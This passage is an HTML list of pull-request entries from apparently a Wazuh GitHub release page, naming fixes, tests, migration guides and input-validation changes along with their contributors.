<li>Fix race condition preventing inventory synchronization after agent reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551769345" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36682" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36682/hovercard" href="https://github.com/wazuh/wazuh/pull/36682">#36682</a></li>
<li>Added API integration tests workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472493573" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36196" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36196/hovercard" href="https://github.com/wazuh/wazuh/pull/36196">#36196</a></li>
<li>Fix non-atomic write for <code>file_status.json</code> in logcollector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565514906" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36722" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36722/hovercard" href="https://github.com/wazuh/wazuh/pull/36722">#36722</a></li>
<li>Make agent-info shutdown waits interruptible by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4564093587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36719" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36719/hovercard" href="https://github.com/wazuh/wazuh/pull/36719">#36719</a></li>
<li>Validate IP address in ip-customblock active response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570134407" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36730" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36730/hovercard" href="https://github.com/wazuh/wazuh/pull/36730">#36730</a></li>
<li>wazuh-agent remains active after uninstall on Fedora 44 / DNF5 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568853035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36727/hovercard" href="https://github.com/wazuh/wazuh/pull/36727">#36727</a></li>
<li>Use per-target rpath and remove redundant LD_LIBRARY_PATH/WAZUH_ENGINE_GROUP exports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531005682" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36455" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36455/hovercard" href="https://github.com/wazuh/wazuh/pull/36455">#36455</a></li>
<li>Fix changelog chronological order and update bumper script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4569560130" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36729" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36729/hovercard" href="https://github.com/wazuh/wazuh/pull/36729">#36729</a></li>
<li>Monitoring a symlink without follow_symbolic_link by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4444803761" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36081" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36081/hovercard" href="https://github.com/wazuh/wazuh/pull/36081">#36081</a></li>
<li>SCA policies migration guide from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550901765" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36671" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36671/hovercard" href="https://github.com/wazuh/wazuh/pull/36671">#36671</a></li>
<li>Fix 5x  wazuhdb integration tests  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562864780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36713" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36713/hovercard" href="https://github.com/wazuh/wazuh/pull/36713">#36713</a></li>
<li>Downgrade transient manager-reported sync failures logs to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576461814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36744" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36744/hovercard" href="https://github.com/wazuh/wazuh/pull/36744">#36744</a></li>
<li>Show sca timouts as Not Run by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488962491" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36258" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36258/hovercard" href="https://github.com/wazuh/wazuh/pull/36258">#36258</a></li>
<li>Authd workflow creation for 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522600046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36404" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36404/hovercard" href="https://github.com/wazuh/wazuh/pull/36404">#36404</a></li>
<li>Adapt remoted tests to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541524155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36609" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36609/hovercard" href="https://github.com/wazuh/wazuh/pull/36609">#36609</a></li>
<li>Update unclassified event criteria by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551542627" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36681" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36681/hovercard" href="https://github.com/wazuh/wazuh/pull/36681">#36681</a></li>
<li>use safeloader in yaml file loader by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582767203" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36753" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36753/hovercard" href="https://github.com/wazuh/wazuh/pull/36753">#36753</a></li>
<li>Downgrade expected modulesd socket warnings/errors during agent restart to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583215822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36755" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36755/hovercard" href="https://github.com/wazuh/wazuh/pull/36755">#36755</a></li>
<li>Documentation: Ciscat and openscap migration to SCA by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4566095438" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36723" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36723/hovercard" href="https://github.com/wazuh/wazuh/pull/36723">#36723</a></li>
<li>Document the deprecation of OSquery in order to use IT Hygiene in version 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583642489" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36756" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36756/hovercard" href="https://github.com/wazuh/wazuh/pull/36756">#36756</a></li>
<li>Preserve wazuh-syscheckd Full Disk Access attribution on macOS reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583103632" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36754" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36754/hovercard" href="https://github.com/wazuh/wazuh/pull/36754">#36754</a></li>
<li>Normalize severity Msg  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588829137" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36759" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36759/hovercard" href="https://github.com/wazuh/wazuh/pull/36759">#36759</a></li>
<li>Agent Groups 5x Migration Guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568131074" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36726" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36726/hovercard" href="https://github.com/wazuh/wazuh/pull/36726">#36726</a></li>
<li>Add NULL validation for optional FlatBuffer fields in inventory_sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598119007" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36773/hovercard" href="https://github.com/wazuh/wazuh/pull/36773">#36773</a></li>
<li>Fix agent keepalive scheduling after system clock rollback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503704905" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36338" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36338/hovercard" href="https://github.com/wazuh/wazuh/pull/36338">#36338</a></li>
<li>Create integratord migration guide to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li>Syslog output (csyslogd) 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gonzaarancibia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gonzaarancibia">@gonzaarancibia</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573759572" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36741" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36741/hovercard" href="https://github.com/wazuh/wazuh/pull/36741">#36741</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596517095" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36767" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36767/hovercard" href="https://github.com/wazuh/wazuh/pull/36767">#36767</a></li>
<li>Migration documentation: syslog input alternative by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613452406" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36781" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36781/hovercard" href="https://github.com/wazuh/wazuh/pull/36781">#36781</a></li>
<li>Drop libcrypt dependency from Python dep by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a></li>
<li>Change duplicated link to intented one by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619366060" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36794" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36794/hovercard" href="https://github.com/wazuh/wazuh/pull/36794">#36794</a></li>
<li>Add centralized input validation for active response framework by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578234540" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36745" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36745/hovercard" href="https://github.com/wazuh/wazuh/pull/36745">#36745</a></li>
<li>Fix sca check for etc/shadow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619503472" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36795" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36795/hovercard" href="https://github.com/wazuh/wazuh/pull/36795">#36795</a></li>
<li>Align remoted metrics shipper with new field names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572800781" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36740" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36740/hovercard" href="https://github.com/wazuh/wazuh/pull/36740">#36740</a></li>
<li>Fix wrap PolicyBanner stat in 'sh -c' so glob expands in macOS SCA check 41062 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615585186" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36783" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36783/hovercard" href="https://github.com/wazuh/wazuh/pull/36783">#36783</a></li>
<li>Bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623354993" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36801" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36801/hovercard" href="https://github.com/wazuh/wazuh/pull/36801">#36801</a></li>
<li>Defer module coordination while FIM first sync is in progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591815012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36762" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36762/hovercard" href="https://github.com/wazuh/wazuh/pull/36762">#36762</a></li>
<li>Revert "Bump main branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623582882" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36802" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36802/hovercard" href="https://github.com/wazuh/wazuh/pull/36802">#36802</a></li>
<li>Change log severity for recoverable and expected conditions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615970610" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36786" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36786/hovercard" href="https://github.com/wazuh/wazuh/pull/36786">#36786</a></li>
<li>Prevent data race in schema validator factory concurrent initialization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616512800" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36789" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36789/hovercard" href="https://github.com/wazuh/wazuh/pull/36789">#36789</a></li>
<li>Schema generation for dotted and nested field mappings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536240667" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36473" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36473/hovercard" href="https://github.com/wazuh/wazuh/pull/36473">#36473</a></li>
<li>Engine support null values in schema validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535313001" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36470" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36470/hovercard" href="https://github.com/wazuh/wazuh/pull/36470">#36470</a></li>
<li>docs: add Active Response 4.x to 5.x migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
<li>Use env mappings for variable passing in builderpackage workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572105403" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36738" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36738/hovercard" href="https://github.com/wazuh/wazuh/pull/36738">#36738</a></li>
<li>Adds 4.x to 5.x migration documentation. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615736469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36785" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36785/hovercard" href="https://github.com/wazuh/wazuh/pull/36785">#36785</a></li>
<li>Fix AWS cross-account SQS queue URL when using iam_role_arn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617279433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36791" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36791/hovercard" href="https://github.com/wazuh/wazuh/pull/36791">#36791</a></li>
<li>Fix enrollment key validation and improve input handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4629562793" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36807" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36807/hovercard" href="https://github.com/wazuh/wazuh/pull/36807">#36807</a></li>
<li>Lower agent_sync_protocol and module sync log levels to reduce false-alarm noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634109312" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36817" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36817/hovercard" href="https://github.com/wazuh/wazuh/pull/36817">#36817</a></li>
<li>Add unit tests for utils, aws_tools, DockerListener, gcloud and azure modules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591653615" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36761" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36761/hovercard" href="https://github.com/wazuh/wazuh/pull/36761">#36761</a></li>
<li>Normalize numeric inode to string events (6960) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641496397" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36837" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36837/hovercard" href="https://github.com/wazuh/wazuh/pull/36837">#36837</a></li>
<li>Prevent indexer consumer wait during shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640571004" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36836" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36836/hovercard" href="https://github.com/wazuh/wazuh/pull/36836">#36836</a></li>
<li>Update manager 5x documentation  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639437920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36833/hovercard" href="https://github.com/wazuh/wazuh/pull/36833">#36833</a></li>
<li>Add bump-issue-link support to bumper workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664679055" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36868" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36868/hovercard" href="https://github.com/wazuh/wazuh/pull/36868">#36868</a></li>
